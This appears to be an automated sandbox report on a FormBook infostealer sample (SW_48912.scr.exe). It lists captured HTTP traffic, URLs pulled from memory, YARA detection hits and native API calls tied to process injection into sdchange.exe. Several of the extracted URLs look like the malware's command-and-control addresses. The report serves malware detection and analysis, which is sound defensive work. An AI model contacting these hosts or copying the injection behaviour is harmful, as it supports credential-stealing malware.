                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 24 Dec 2024 10:36:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 24 Dec 2024 10:36:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 10:36:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 10:36:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 10:36:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 10:36:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 24 Dec 2024 10:38:14 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-24T10:38:19.3234688Z
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: SW_48912.scr.exe, 00000000.00000002.1920984218.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: kygSlzwdnMXWUy.exe, 0000000B.00000002.3540931534.000000000549D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz
                Source: kygSlzwdnMXWUy.exe, 0000000B.00000002.3540931534.000000000549D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz/uwne/
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp, SW_48912.scr.exe, 00000000.00000002.1929676185.0000000004F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000005B72000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003EF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFle
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sdchange.exe, 0000000A.00000003.2217160682.0000000007870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sdchange.exe, 0000000A.00000002.3541338963.0000000007570000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.000000000584E000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.0000000005398000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.00000000056BC000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003BCE000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003718000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0042C533 NtClose,5_2_0042C533
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422B60 NtClose,LdrInitializeThunk,5_2_01422B60
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01422DF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01422C70
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014235C0 NtCreateMutant,LdrInitializeThunk,5_2_014235C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01424340 NtSetContextThread,5_2_01424340
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01424650 NtSuspendThread,5_2_01424650
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422BE0 NtQueryValueKey,5_2_01422BE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422BF0 NtAllocateVirtualMemory,5_2_01422BF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422B80 NtQueryInformationFile,5_2_01422B80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422BA0 NtEnumerateValueKey,5_2_01422BA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422AD0 NtReadFile,5_2_01422AD0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422AF0 NtWriteFile,5_2_01422AF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422AB0 NtWaitForSingleObject,5_2_01422AB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422D00 NtSetInformationFile,5_2_01422D00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422D10 NtMapViewOfSection,5_2_01422D10
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422D30 NtUnmapViewOfSection,5_2_01422D30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422DD0 NtDelayExecution,5_2_01422DD0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422DB0 NtEnumerateKey,5_2_01422DB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422C60 NtCreateKey,5_2_01422C60
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422C00 NtQueryInformationProcess,5_2_01422C00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422CC0 NtQueryVirtualMemory,5_2_01422CC0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422CF0 NtOpenProcess,5_2_01422CF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422CA0 NtQueryInformationToken,5_2_01422CA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422F60 NtCreateProcessEx,5_2_01422F60
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422F30 NtCreateSection,5_2_01422F30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422FE0 NtCreateFile,5_2_01422FE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422F90 NtProtectVirtualMemory,5_2_01422F90
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422FA0 NtQuerySection,5_2_01422FA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422FB0 NtResumeThread,5_2_01422FB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422E30 NtWriteVirtualMemory,5_2_01422E30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422EE0 NtQueueApcThread,5_2_01422EE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422E80 NtReadVirtualMemory,5_2_01422E80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422EA0 NtAdjustPrivilegesToken,5_2_01422EA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423010 NtOpenDirectoryObject,5_2_01423010
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423090 NtSetValueKey,5_2_01423090
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014239B0 NtGetContextThread,5_2_014239B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423D70 NtOpenThread,5_2_01423D70
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423D10 NtOpenProcessToken,5_2_01423D10
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D4650 NtSuspendThread,LdrInitializeThunk,10_2_046D4650
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D4340 NtSetContextThread,LdrInitializeThunk,10_2_046D4340
